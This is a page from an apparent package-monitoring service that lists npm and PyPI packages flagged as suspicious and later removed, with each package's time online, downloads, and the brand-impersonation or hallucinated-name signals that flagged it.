  • HIGHClaims critical enterprise brand identity ('LEDGER').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed solana npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: node-solana-settlement-solana
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name '@p-acp/settlement-solana' matches AI hallucination template [node] + [solana] + [settlement-solana].
  • HIGHClaims critical enterprise brand identity ('SOLANA').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: google-google-mcp
Registry downloads (last seen): 688/month (MODERATE_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed microsoft npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: microsoft-microsoft-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('MICROSOFT').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed solana pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: crimson-solana-toolkit
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'crimson-solana-toolkit' matches AI hallucination template [crimson] + [solana] + [toolkit].
  • HIGHClaims critical enterprise brand identity ('SOLANA').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed microsoft npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: microsoft-microsoft-react
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('MICROSOFT').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: node-google-nolb-_expo-google-fonts_i
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name '@zalastax/nolb-_expo-google-fonts_i' matches AI hallucination template [node] + [google] + [nolb-_expo-google-fonts_i].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: node-google-nolb-_expo-google-fonts_k
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name '@zalastax/nolb-_expo-google-fonts_k' matches AI hallucination template [node] + [google] + [nolb-_expo-google-fonts_k].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed amazon npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: react-amazon-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'react-amazon-auth' matches AI hallucination template [react] + [amazon] + [auth].
  • HIGHClaims critical enterprise brand identity ('AMAZON').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed amazon npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: amazon-amazon-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('AMAZON').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed amazon npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: amazon-amazon-react
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('AMAZON').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed binance pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: unicorn-binance-depth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'unicorn-binance-depth-cache' matches AI hallucination template [unicorn] + [binance] + [depth].
  • HIGHClaims critical enterprise brand identity ('BINANCE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed hf pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-hf-excel
Automated signals flagged:
  • MEDIUMPackage name 'hf-excel' matches AI hallucination template [python] + [hf] + [excel].
  • HIGHClaims critical enterprise brand identity ('HF').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed cloudflare npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: react-cloudflare-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'react-cloudflare-auth' matches AI hallucination template [react] + [cloudflare] + [auth].
  • HIGHClaims critical enterprise brand identity ('CLOUDFLARE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed web3 pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-web3-0
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'web3-0' matches AI hallucination template [python] + [web3] + [0].
  • HIGHClaims critical enterprise brand identity ('WEB3').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed cloudflare npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: cloudflare-cloudflare-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLOUDFLARE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed cloudflare npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: cloudflare-cloudflare-react
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLOUDFLARE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed solana pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-solana-acceso
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'acceso-solana' matches AI hallucination template [python] + [solana] + [acceso].
  • HIGHClaims critical enterprise brand identity ('SOLANA').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed workspace pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-workspace-extractor
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'workspace-extractor' matches AI hallucination template [python] + [workspace] + [extractor].
  • HIGHClaims critical enterprise brand identity ('WORKSPACE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed claude pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 17h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: llm-claude-claude
Automated signals flagged:
  • MEDIUMPackage name 'llm-tracekit-claude-agent-sdk' matches AI hallucination template [llm] + [claude] + [claude].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed perplexity pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-perplexity-image
Registry downloads (last seen): 10/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'perplexity-image' matches AI hallucination template [python] + [perplexity] + [image].
  • HIGHClaims critical enterprise brand identity ('PERPLEXITY').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed datadog pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: peloton-datadog-metrics
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'peloton-datadog-metrics' matches AI hallucination template [peloton] + [datadog] + [metrics].
  • HIGHClaims critical enterprise brand identity ('DATADOG').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed google npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: node-google-nolb-_expo-google-fonts_e
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name '@infinitebrahmanuniverse/nolb-_expo-google-fonts_e' matches AI hallucination template [node] + [google] + [nolb-_expo-google-fonts_e].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed stripe pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-stripe-package
Automated signals flagged:
  • MEDIUMPackage name 'stripe-package' matches AI hallucination template [python] + [stripe] + [package].
  • HIGHClaims critical enterprise brand identity ('STRIPE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed xai pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-xai-prism
Registry downloads (last seen): 12/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'prism-xai' matches AI hallucination template [python] + [xai] + [prism].
  • HIGHClaims critical enterprise brand identity ('XAI').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed claude pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 14h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-claude-databricks
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'databricks-claude' matches AI hallucination template [python] + [claude] + [databricks].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed polygon pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-polygon-bardata
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'bardata-polygon' matches AI hallucination template [python] + [polygon] + [bardata].
  • HIGHClaims critical enterprise brand identity ('POLYGON').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed polygon pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-polygon-finance
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'polygon-finance' matches AI hallucination template [python] + [polygon] + [finance].
  • HIGHClaims critical enterprise brand identity ('POLYGON').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed stability pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: byted-stability-wallet
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'byted-overpass-wallet-stability-oncall-agent' matches AI hallucination template [byted] + [stability] + [wallet].
  • HIGHClaims critical enterprise brand identity ('STABILITY').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed chroma pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 12h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-chroma-squeeze
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'chroma-squeeze' matches AI hallucination template [python] + [chroma] + [squeeze].
  • HIGHClaims critical enterprise brand identity ('CHROMA').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed chainlink pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-chainlink-utils
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'chainlink-utils' matches AI hallucination template [python] + [chainlink] + [utils].
  • HIGHClaims critical enterprise brand identity ('CHAINLINK').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed claude pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 14h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-claude-free
Automated signals flagged:
  • MEDIUMPackage name 'free-claude' matches AI hallucination template [python] + [claude] + [free].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed eth pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: send-eth-run
Automated signals flagged:
  • MEDIUMPackage name 'send-eth-run' matches AI hallucination template [send] + [eth] + [run].
  • HIGHClaims critical enterprise brand identity ('ETH').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed vllm pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 7h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: vaiden-vllm-tools
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'vaiden-vllm-tools' matches AI hallucination template [vaiden] + [vllm] + [tools].
  • HIGHClaims critical enterprise brand identity ('VLLM').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed vault npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: react-vault-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'react-vault-auth' matches AI hallucination template [react] + [vault] + [auth].
  • HIGHClaims critical enterprise brand identity ('VAULT').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed alchemy pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: python-alchemy-mapper
Automated signals flagged:
  • MEDIUMPackage name 'alchemy-mapper' matches AI hallucination template [python] + [alchemy] + [mapper].
  • HIGHClaims critical enterprise brand identity ('ALCHEMY').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed vault npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: vault-vault-auth
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('VAULT').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed binance pypi 0.1.0
Removed from: PyPI (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: unicorn-binance-trailing
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • MEDIUMPackage name 'unicorn-binance-trailing-stop-loss-engine' matches AI hallucination template [unicorn] + [binance] + [trailing].
  • HIGHClaims critical enterprise brand identity ('BINANCE').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
75 not measured 2026-09-07
20:10 UTC ~
registry removed vault npm 0.1.0
Removed from: npm (registry removed)
First flagged by Sentinel:
First seen gone: 2026-09-07 20:10 UTC (we don't have the registry's exact removal time)
Online before takedown: 10h (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 75
Matched naming pattern: vault-vault-react
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('VAULT').

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →

LINK COPIED TO CLIPBOARD